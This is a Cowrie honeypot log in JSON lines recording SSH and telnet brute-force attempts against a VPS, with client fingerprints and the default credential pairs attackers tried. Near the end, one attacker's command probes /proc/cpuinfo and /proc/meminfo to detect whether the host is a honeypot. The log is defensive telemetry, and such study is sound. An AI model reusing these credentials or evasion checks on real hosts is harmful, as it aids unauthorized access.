{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:20:17.780218Z","src_ip":"92.118.39.71","session":"cbbcdaea10e2"}
{"eventid":"cowrie.login.failed","username":"sol","password":"sol","message":"login attempt [sol/sol] failed","sensor":"my-vps","timestamp":"2025-08-24T18:20:17.871722Z","src_ip":"92.118.39.71","session":"cbbcdaea10e2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:20:18.903457Z","src_ip":"92.118.39.71","session":"cbbcdaea10e2"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52536,"dst_ip":"1.2.3.4","dst_port":22,"session":"caba16b03859","protocol":"ssh","message":"New connection: 217.72.205.35:52536 (1.2.3.4:22) [session: caba16b03859]","sensor":"my-vps","timestamp":"2025-08-24T18:20:43.917367Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:20:43.919095Z","src_ip":"217.72.205.35","session":"caba16b03859"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":56404,"dst_ip":"1.2.3.4","dst_port":22,"session":"f191a962c6f0","protocol":"ssh","message":"New connection: 92.118.39.71:56404 (1.2.3.4:22) [session: f191a962c6f0]","sensor":"my-vps","timestamp":"2025-08-24T18:26:48.814251Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:26:48.815094Z","src_ip":"92.118.39.71","session":"f191a962c6f0"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:26:48.845562Z","src_ip":"92.118.39.71","session":"f191a962c6f0"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu","message":"login attempt [ubuntu/ubuntu] failed","sensor":"my-vps","timestamp":"2025-08-24T18:26:48.937268Z","src_ip":"92.118.39.71","session":"f191a962c6f0"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:26:49.969440Z","src_ip":"92.118.39.71","session":"f191a962c6f0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64222,"dst_ip":"1.2.3.4","dst_port":22,"session":"0442cf8e755c","protocol":"ssh","message":"New connection: 217.72.205.35:64222 (1.2.3.4:22) [session: 0442cf8e755c]","sensor":"my-vps","timestamp":"2025-08-24T18:27:25.704163Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:27:25.706442Z","src_ip":"217.72.205.35","session":"0442cf8e755c"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":56620,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e4521563083","protocol":"ssh","message":"New connection: 45.88.8.186:56620 (1.2.3.4:22) [session: 9e4521563083]","sensor":"my-vps","timestamp":"2025-08-24T18:27:32.081917Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:27:32.495765Z","src_ip":"45.88.8.186","session":"9e4521563083"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T18:27:32.496400Z","src_ip":"45.88.8.186","session":"9e4521563083"}
{"eventid":"cowrie.login.success","username":"root","password":"1234qwer!@#$QWER","message":"login attempt [root/1234qwer!@#$QWER] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:27:35.364835Z","src_ip":"45.88.8.186","session":"9e4521563083"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:27:36.237927Z","src_ip":"45.88.8.186","session":"9e4521563083"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":59092,"dst_ip":"1.2.3.4","dst_port":23,"session":"ffd6baf7ddc9","protocol":"telnet","message":"New connection: 176.65.149.186:59092 (1.2.3.4:23) [session: ffd6baf7ddc9]","sensor":"my-vps","timestamp":"2025-08-24T18:28:45.691336Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:28:45.728776Z","src_ip":"176.65.149.186","session":"ffd6baf7ddc9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T18:28:45.786138Z","src_ip":"176.65.149.186","session":"ffd6baf7ddc9"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-24T18:28:45.787928Z","src_ip":"176.65.149.186","session":"ffd6baf7ddc9"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-24T18:28:45.788955Z","src_ip":"176.65.149.186","session":"ffd6baf7ddc9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:31:45.815978Z","src_ip":"176.65.149.186","session":"ffd6baf7ddc9"}
{"eventid":"cowrie.session.closed","duration":180.12982749938965,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:31:45.819887Z","src_ip":"176.65.149.186","session":"ffd6baf7ddc9"}
{"eventid":"cowrie.session.connect","src_ip":"183.247.194.8","src_port":41402,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7a1adc3ec9e","protocol":"ssh","message":"New connection: 183.247.194.8:41402 (1.2.3.4:22) [session: d7a1adc3ec9e]","sensor":"my-vps","timestamp":"2025-08-24T18:32:24.675996Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:32:25.358263Z","src_ip":"183.247.194.8","session":"d7a1adc3ec9e"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":33932,"dst_ip":"1.2.3.4","dst_port":22,"session":"387e4d1aab4a","protocol":"ssh","message":"New connection: 92.118.39.71:33932 (1.2.3.4:22) [session: 387e4d1aab4a]","sensor":"my-vps","timestamp":"2025-08-24T18:33:21.854125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:33:21.855203Z","src_ip":"92.118.39.71","session":"387e4d1aab4a"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:33:21.885652Z","src_ip":"92.118.39.71","session":"387e4d1aab4a"}
{"eventid":"cowrie.login.failed","username":"sol","password":"123","message":"login attempt [sol/123] failed","sensor":"my-vps","timestamp":"2025-08-24T18:33:21.979203Z","src_ip":"92.118.39.71","session":"387e4d1aab4a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:33:23.012001Z","src_ip":"92.118.39.71","session":"387e4d1aab4a"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":60258,"dst_ip":"1.2.3.4","dst_port":23,"session":"4ecd8a06001d","protocol":"telnet","message":"New connection: 176.65.149.186:60258 (1.2.3.4:23) [session: 4ecd8a06001d]","sensor":"my-vps","timestamp":"2025-08-24T18:33:45.924407Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:33:45.960962Z","src_ip":"176.65.149.186","session":"4ecd8a06001d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T18:33:45.982070Z","src_ip":"176.65.149.186","session":"4ecd8a06001d"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-24T18:33:45.983427Z","src_ip":"176.65.149.186","session":"4ecd8a06001d"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-24T18:33:45.984289Z","src_ip":"176.65.149.186","session":"4ecd8a06001d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55962,"dst_ip":"1.2.3.4","dst_port":22,"session":"b868d28cb35e","protocol":"ssh","message":"New connection: 217.72.205.35:55962 (1.2.3.4:22) [session: b868d28cb35e]","sensor":"my-vps","timestamp":"2025-08-24T18:34:18.997558Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:34:18.998756Z","src_ip":"217.72.205.35","session":"b868d28cb35e"}
{"eventid":"cowrie.session.connect","src_ip":"119.160.166.237","src_port":54030,"dst_ip":"1.2.3.4","dst_port":22,"session":"185f79ddd67e","protocol":"ssh","message":"New connection: 119.160.166.237:54030 (1.2.3.4:22) [session: 185f79ddd67e]","sensor":"my-vps","timestamp":"2025-08-24T18:35:16.887500Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:35:17.481205Z","src_ip":"119.160.166.237","session":"185f79ddd67e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:36:46.010753Z","src_ip":"176.65.149.186","session":"4ecd8a06001d"}
{"eventid":"cowrie.session.closed","duration":180.0904438495636,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:36:46.014773Z","src_ip":"176.65.149.186","session":"4ecd8a06001d"}
{"eventid":"cowrie.session.connect","src_ip":"182.139.39.150","src_port":37326,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6da99f7ad9b","protocol":"ssh","message":"New connection: 182.139.39.150:37326 (1.2.3.4:22) [session: c6da99f7ad9b]","sensor":"my-vps","timestamp":"2025-08-24T18:37:11.326639Z"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:37:12.064073Z","src_ip":"182.139.39.150","session":"c6da99f7ad9b"}
{"eventid":"cowrie.session.connect","src_ip":"68.71.247.133","src_port":50024,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e2921aac30e","protocol":"ssh","message":"New connection: 68.71.247.133:50024 (1.2.3.4:22) [session: 9e2921aac30e]","sensor":"my-vps","timestamp":"2025-08-24T18:37:56.277637Z"}
{"eventid":"cowrie.session.connect","src_ip":"92.118.39.71","src_port":39684,"dst_ip":"1.2.3.4","dst_port":22,"session":"538d04be176c","protocol":"ssh","message":"New connection: 92.118.39.71:39684 (1.2.3.4:22) [session: 538d04be176c]","sensor":"my-vps","timestamp":"2025-08-24T18:39:53.760574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:39:53.761529Z","src_ip":"92.118.39.71","session":"538d04be176c"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-24T18:39:53.794827Z","src_ip":"92.118.39.71","session":"538d04be176c"}
{"eventid":"cowrie.login.failed","username":"solana","password":"123456","message":"login attempt [solana/123456] failed","sensor":"my-vps","timestamp":"2025-08-24T18:39:53.886822Z","src_ip":"92.118.39.71","session":"538d04be176c"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:39:54.918788Z","src_ip":"92.118.39.71","session":"538d04be176c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:39:56.280604Z","src_ip":"68.71.247.133","session":"9e2921aac30e"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50240,"dst_ip":"1.2.3.4","dst_port":22,"session":"d36e4a1ebeb1","protocol":"ssh","message":"New connection: 217.72.205.35:50240 (1.2.3.4:22) [session: d36e4a1ebeb1]","sensor":"my-vps","timestamp":"2025-08-24T18:40:51.108135Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:40:51.109339Z","src_ip":"217.72.205.35","session":"d36e4a1ebeb1"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":51982,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d8abef2437f","protocol":"ssh","message":"New connection: 45.88.8.215:51982 (1.2.3.4:22) [session: 6d8abef2437f]","sensor":"my-vps","timestamp":"2025-08-24T18:41:49.764005Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:41:50.206482Z","src_ip":"45.88.8.215","session":"6d8abef2437f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-24T18:41:50.207251Z","src_ip":"45.88.8.215","session":"6d8abef2437f"}
{"eventid":"cowrie.login.success","username":"root","password":"Anupam@123","message":"login attempt [root/Anupam@123] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:41:52.276353Z","src_ip":"45.88.8.215","session":"6d8abef2437f"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:41:52.799805Z","src_ip":"45.88.8.215","session":"6d8abef2437f"}
{"eventid":"cowrie.session.connect","src_ip":"39.73.58.6","src_port":42850,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe7243ae84a9","protocol":"telnet","message":"New connection: 39.73.58.6:42850 (1.2.3.4:23) [session: fe7243ae84a9]","sensor":"my-vps","timestamp":"2025-08-24T18:42:21.411196Z"}
{"eventid":"cowrie.session.closed","duration":13.360249519348145,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:42:34.771367Z","src_ip":"39.73.58.6","session":"fe7243ae84a9"}
{"eventid":"cowrie.session.connect","src_ip":"65.20.132.172","src_port":57369,"dst_ip":"1.2.3.4","dst_port":22,"session":"0d1e56ad8f9f","protocol":"ssh","message":"New connection: 65.20.132.172:57369 (1.2.3.4:22) [session: 0d1e56ad8f9f]","sensor":"my-vps","timestamp":"2025-08-24T18:43:16.606169Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-24T18:43:16.966897Z","src_ip":"65.20.132.172","session":"0d1e56ad8f9f"}
{"eventid":"cowrie.session.connect","src_ip":"185.126.3.131","src_port":56398,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e128ae93ed7","protocol":"ssh","message":"New connection: 185.126.3.131:56398 (1.2.3.4:22) [session: 1e128ae93ed7]","sensor":"my-vps","timestamp":"2025-08-24T18:46:16.661434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-24T18:46:16.666971Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.client.kex","hassh":"16443846184eafde36765c9bab2f4397","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 16443846184eafde36765c9bab2f4397","sensor":"my-vps","timestamp":"2025-08-24T18:46:16.752869Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.login.success","username":"root","password":"RootUser","message":"login attempt [root/RootUser] succeeded","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.117166Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-24T18:46:17.335917Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.337177Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-24T18:46:17.338143Z","src_ip":"185.126.3.131","session":"1e128ae93ed7"}
